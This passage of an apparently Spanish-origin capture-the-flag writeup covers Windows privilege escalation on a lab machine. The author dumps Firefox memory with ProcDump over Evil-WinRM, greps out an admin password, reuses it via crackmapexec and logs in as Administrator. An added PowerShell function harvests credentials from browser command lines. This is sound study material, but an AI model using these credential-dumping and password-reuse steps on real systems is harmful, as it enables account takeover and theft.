     49       6     1792       4544               776   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    964      23     6012      15200               620   0 lsass
    223      13     3168      10248              1584   0 msdtc
      0      12      308      15928                88   0 Registry
    144       8     1616       7448              5708   1 RuntimeBroker
    301      16     5488      16876              5812   1 RuntimeBroker
    274      14     3020      14972              6020   1 RuntimeBroker
    661      32    19444      61012              5628   1 SearchUI
    536      11     4904       9464               604   0 services
    684      29    15008      50704              5480   1 ShellExperienceHost
    440      17     4856      23860              4916   1 sihost
     53       3      528       1108               264   0 smss
    471      22     5824      16296              2336   0 spoolsv
    201      12     2088       9560               304   0 svchost
    150       9     1748      11572               356   0 svchost
     85       5      896       3724               728   0 svchost
    855      20     6964      22444               748   0 svchost
    862      16     5228      11904               856   0 svchost
    254      10     1984       7608               908   0 svchost
    377      13    11724      15476              1040   0 svchost
    140       7     1292       5544              1092   0 svchost
    184       9     1800       7480              1108   0 svchost
    228      12     2588      11128              1120   0 svchost
    430       9     2744       8796              1136   0 svchost
    154       7     1208       5528              1160   0 svchost
    121      15     3240       7152              1200   0 svchost
    215       9     2104       7468              1264   0 svchost
    171      10     1788       7984              1312   0 svchost
    365      17     5264      14184              1348   0 svchost
    230      13     3256       8480              1372   0 svchost
    305      12     2012       8760              1396   0 svchost
    258      13     3408      12636              1404   0 svchost
    344      14     4496      11712              1420   0 svchost
    191      12     2120      11936              1508   0 svchost
    163      10     2864       7364              1612   0 svchost
    320      10     2476       8348              1636   0 svchost
    399      32     7664      16680              1748   0 svchost
    157       8     2096       7240              1824   0 svchost
    194      11     1952       8064              1836   0 svchost
    285      13     4228      11148              1888   0 svchost
    234      11     2368       9612              1992   0 svchost
    166      12     3924      10776              2396   0 svchost
    179      22     2496       9808              2436   0 svchost
    474      20    12532      27380              2448   0 svchost
    261      13     2600       7832              2456   0 svchost
    394      16    11384      20536              2480   0 svchost
    133       9     1632       6472              2548   0 svchost
    136       8     1516       6076              2560   0 svchost
    126       7     1224       5280              2624   0 svchost
    205      11     2408       8428              2652   0 svchost
    233      14     4700      11756              2672   0 svchost
    205      12     1836       7344              2704   0 svchost
    266      19     4796      13412              2736   0 svchost
    169      10     2148      13128              2772   0 svchost
    464      16     3340      11740              2784   0 svchost
    382      23     3340      12176              3192   0 svchost
    171       9     1496       7184              3520   0 svchost
    333      18    14896      31408              3524   0 svchost
    206      11     2700      11832              3580   0 svchost
    299      20     9384      15072              4540   0 svchost
    161       9     3828      11444              4664   0 svchost
    194      15     6024      10016              4704   0 svchost
    173      11     2536      13172              4732   0 svchost
    127       7     1576       6220              4784   0 svchost
    230      12     3092      13584              4928   1 svchost
    365      18     5612      27016              4952   1 svchost
    249      14     3076      13632              5068   0 svchost
    122       7     1232       5496              5192   0 svchost
    163       9     3064       7620              5316   0 svchost
    115       7     1272       5364              6616   0 svchost
    223      11     2828      10900              6872   0 svchost
    311      16    15248      17224              6876   0 svchost
   1877       0      192         96                 4   0 System
    210      20     3984      12316              4988   1 taskhostw
    167      11     2944      10784              2632   0 VGAuthService
    142       8     1688       6756              2688   0 vm3dservice
    136       9     1804       7280              2976   1 vm3dservice
    384      22    10012      22352              2696   0 vmtoolsd
    236      18     5088      15136              5584   1 vmtoolsd
    171      11     1484       6820               468   0 wininit
    282      13     2704      12892               532   1 winlogon
    339      15     9284      19288              3932   0 WmiPrvSE
   1464      28   109968     129332       1.94   7088   0 wsmprovhost

Since Firefox is running, we can create a dump of the process to check whether it holds credentials, using ProcDump from Sysinternals (https://learn.microsoft.com/es-es/sysinternals/downloads/procdump). Once downloaded and placed in the directory from which we started the evil-winrm connection, we upload the binary to the victim machine

```
*Evil-WinRM* PS C:\Windows\Temp\Privesc> upload procdump64.exe

Info: Uploading /home/justice-reaper/Desktop/Heist/content/procdump64.exe to C:\Windows\Temp\Privesc\procdump64.exe

Data: 566472 bytes of 566472 bytes copied

Info: Upload successful!
```

We list the PIDs of the firefox processes. We will dump the first one, PID 788, the main browser process: it has the lowest PID and by far the largest working set

```
*Evil-WinRM* PS C:\> ps | findstr firefox
   1060      71   152672     230480       5.14    788   1 firefox
    347      19    10228      38556       0.05   4212   1 firefox
    401      34    35588      95060       0.72   6248   1 firefox
    378      28    22952      59920       0.28   6444   1 firefox
    355      25    16428      38760       0.13   6688   1 firefox
```

We take a full memory dump of the process (`-ma`) and download it to our machine

```
*Evil-WinRM* PS C:\Windows\Temp\Privesc> ./procdump64.exe -accepteula 788 -ma

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[05:21:21] Dump 1 initiated: C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp
[05:21:21] Dump 1 writing: Estimated dump file size is 510 MB.
[05:21:24] Dump 1 complete: 510 MB written in 2.8 seconds
[05:21:24] Dump count reached.

*Evil-WinRM* PS C:\Windows\Temp\Privesc> download C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp

Info: Downloading C:\Windows\Temp\Privesc\firefox.exe_240802_052121.dmp to firefox.exe_240802_052121.dmp
Progress: 2% : |▒░░░░░░░░░░|
```

The dump lands in the directory from which we launched evil-winrm. There is no need to wait for the 510 MB download to finish: running `strings` over the partial file and filtering for `password` is already enough. The credential is part of the URL that firefox.exe was launched with, which is why it shows up next to the executable path, i.e. as the process command line, rather than buried deep in the heap

```
# strings firefox.exe_240802_052121.dmp | grep password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
```
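Because the password is simply a parameter of the URL firefox.exe was started with, the same value can be read from the process command line on the target without dumping and transferring 510 MB of memory. The following is an added example, not code from the original writeup: it queries Win32_Process through CIM for every firefox.exe, extracts the `login_username` / `login_password` parameters (the names come from the dump output above) and URL-decodes them in case the password was percent-encoded at launch. The function names and the constructed sample command line are assumptions for illustration.

```powershell
# Added example (not from the original writeup): recover the credential from the
# firefox.exe command line instead of from a full memory dump.

function ConvertFrom-LoginUrl {
    # Parse login_username / login_password out of a command-line string.
    # Returns $null when the string carries no such parameters (e.g. child processes).
    param([string]$CommandLine)
    if ($CommandLine -match 'login_username=([^&\s"]+)&login_password=([^&\s"]+)') {
        return [pscustomobject]@{
            # Decode percent-encoding so the value is usable as typed.
            Username = [uri]::UnescapeDataString($Matches[1])
            Password = [uri]::UnescapeDataString($Matches[2])
        }
    }
    return $null
}

function Get-FirefoxUrlCredential {
    # Win32_Process.CommandLine is readable for the current user's own processes,
    # so no extra privilege is needed from the Evil-WinRM session.
    Get-CimInstance Win32_Process -Filter "Name = 'firefox.exe'" |
        ForEach-Object {
            $cred = ConvertFrom-LoginUrl -CommandLine $_.CommandLine
            if ($cred) {
                [pscustomobject]@{
                    ProcessId = $_.ProcessId
                    Username  = $cred.Username
                    Password  = $cred.Password
                }
            }
        }
}

# Constructed sample (same shape as the dump output, with the password percent-encoded);
# not captured from the box. Decodes to admin@support.htb / 4dD!5}x/re8]FBuZ
$sample = '"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD%215%7Dx%2Fre8%5DFBuZ&login='
ConvertFrom-LoginUrl -CommandLine $sample

# Live query, run inside the Evil-WinRM shell on the target:
Get-FirefoxUrlCredential
```

Only the main browser process carries the URL argument; the child processes return nothing from `ConvertFrom-LoginUrl` and are skipped. The dump-and-`strings` route is still worth knowing for cases where the secret was entered into the page rather than passed on the command line, since it is then only present in process memory.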

We validate the credential we obtained. It belongs to `admin@support.htb` on the local web application, but we test it against the local Administrator account in case it has been reused

```
# crackmapexec winrm 10.129.187.132 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
SMB         10.129.187.132  5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.129.187.132  5985   SUPPORTDESK      [*] http://10.129.187.132:5985/wsman
WINRM       10.129.187.132  5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
```

The password is reused, so we connect to the victim machine as Administrator

```
# evil-winrm -u 'Administrator' -p '4dD!5}x/re8]FBuZ' -i 10.129.187.132

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
```

This post is licensed under CC BY 4.0 by the author.